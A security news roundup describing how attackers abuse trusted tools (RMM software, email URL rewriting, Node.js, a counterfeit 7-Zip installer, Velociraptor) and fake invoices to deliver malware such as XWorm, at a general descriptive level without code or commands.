Cybercriminals Exploit Trusted Tools to Deploy Notorious Malware
In recent years, cybercriminals have increasingly turned to exploiting legitimate system utilities and trusted tools to conduct their malicious activities. This strategy, known as living off the land, allows attackers to blend their operations with normal system processes, making detection significantly more challenging.
The Rise of Living-Off-the-Land Attacks
The living off the land approach involves using tools already present on a target’s system, such as PowerShell, Windows Script Host, or JavaScript environments, rather than deploying external malware. This method enables attackers to execute malicious code without leaving traditional malware footprints, thereby evading signature-based detection systems.
According to ANY.RUN’s Q1 2026 Cyber Risk Report, which analyzed over 2.1 million malware and phishing investigations, there has been a significant increase in such attacks. Credential theft rose by 14.7%, loader-based attacks spiked by 98.3%, and Living-off-the-Land Binary and Script (LOLBAS) attacks leveraging JavaScript surged by 58.4%. These statistics highlight a shift towards more covert and rapid attack methodologies.
Exploitation of Remote Monitoring and Management (RMM) Tools
Remote Monitoring and Management (RMM) tools, designed to assist IT administrators in system maintenance and support, have become prime targets for exploitation. Attackers leverage these tools to infiltrate networks, maintain access, and facilitate lateral movement within systems.
Commonly exploited RMM applications include AnyDesk, TeamViewer, ScreenConnect, Quick Assist, and Splashtop. These tools are widely deployed across organizations for legitimate purposes, making malicious usage difficult to detect. Intel471 analysts have identified that attackers often gain initial access to RMM software by compromising user credentials through social engineering tactics or by exploiting vulnerabilities in outdated software.
Weaponization of URL Rewriting Mechanisms
Phishing attackers have found ways to turn standard security features against the very users they were built to protect. By abusing URL rewriting—a defensive mechanism embedded in most enterprise email gateways—threat actors are weaponizing trusted safe links to carry malicious payloads past detection filters.
URL rewriting works by intercepting links inside incoming emails and replacing them with vendor-generated URLs that route users through security scanning servers the moment a link is clicked. Threat actors exploit this by operating through compromised accounts where URL rewriting is active, tricking the system into generating pre-wrapped safe links that carry a trusted vendor domain and can be reused across broad phishing campaigns.
LevelBlue analysts identified a significant escalation in this tactic between the second and fourth quarters of 2025, noting that adversaries had moved from single-layer abuse to building multi-layered URL rewriting chains across several trusted vendor domains. The goal was to stack redirect hops deep enough that no automated scanner could trace the link back to its true destination.
Abuse of Node.js for Malware Delivery
Attackers are increasingly exploiting Node.js, a widely trusted, open-source JavaScript runtime, to deliver sophisticated malware, steal sensitive data, and compromise entire systems. Recent campaigns observed since late 2024 have showcased a shift in attacker tactics. They leverage Node.js both for direct script execution and as a vehicle for compiled malware, often bypassing traditional security controls.
Thanks to its cross-platform capabilities and robust ecosystem, Node.js is popular among developers for building scalable front-end and back-end applications. However, threat actors are now weaponizing these very strengths. Embedding malicious code within Node.js executables or npm (Node Package Manager) packages allows attackers to blend their malware with legitimate applications, evade detection, and persist within target environments.
Malicious Use of 7-Zip Installers
A deceptive campaign targeting unsuspecting users has emerged, using a counterfeit version of the widely used 7-Zip file archiving software to silently transform home computers into residential proxy nodes. The malicious operation relies on a lookalike domain, 7zip[.]com, which closely mimics the legitimate 7-zip.org website, tricking users into downloading a compromised installer that appears fully functional while concealing dangerous malware components.
The threat came to public attention after a Reddit user shared their troubling experience in the r/pcmasterrace community. While following a YouTube tutorial for building a new PC, they were directed to download 7-Zip from the fraudulent domain. After installing the software on both a laptop and a newly assembled desktop via USB transfer, the user encountered persistent compatibility errors but continued using the system.
Nearly two weeks passed before Microsoft Defender flagged the infection with a generic trojan detection, revealing the hidden compromise.
Leveraging Velociraptor for Stealthy Command and Control
Legitimate administrative tools are increasingly becoming the weapon of choice for sophisticated threat actors aiming to blend in with normal network activity. A recent campaign has highlighted this dangerous trend, where attackers are weaponizing Velociraptor, a widely respected Digital Forensics and Incident Response (DFIR) tool.
By deploying this software, adversaries effectively establish stealthy Command and Control (C2) channels, allowing them to execute arbitrary commands and maintain persistent access to compromised environments without triggering traditional security alarms.
The attacks, observed throughout late 2025, leverage critical vulnerabilities in widely used enterprise infrastructure, specifically targeting Windows Server Update Services (WSUS) and Microsoft SharePoint. Once inside, the actors deploy Velociraptor to facilitate lateral movement and, in confirmed cases, deliver the Warlock ransomware.
Weaponization of Invoices to Deliver XWorm
Attackers are using fake invoice emails to spread XWorm, a remote-access trojan that quietly steals login credentials, passwords, and sensitive files from infected computers. When a user opens the attached Visual Basic Script file, the malware begins working silently in the background without any visible warnings or alerts. This makes it extremely dangerous because victims never know their system is compromised until it’s too late.
Once active, XWorm gives attackers complete control over the infected machine, allowing them to record keystrokes, spy on users, steal personal data, and even install additional threats like ransomware.�
Article X Post:
Hashtags:
Article Key Phrase:
Category: Security News
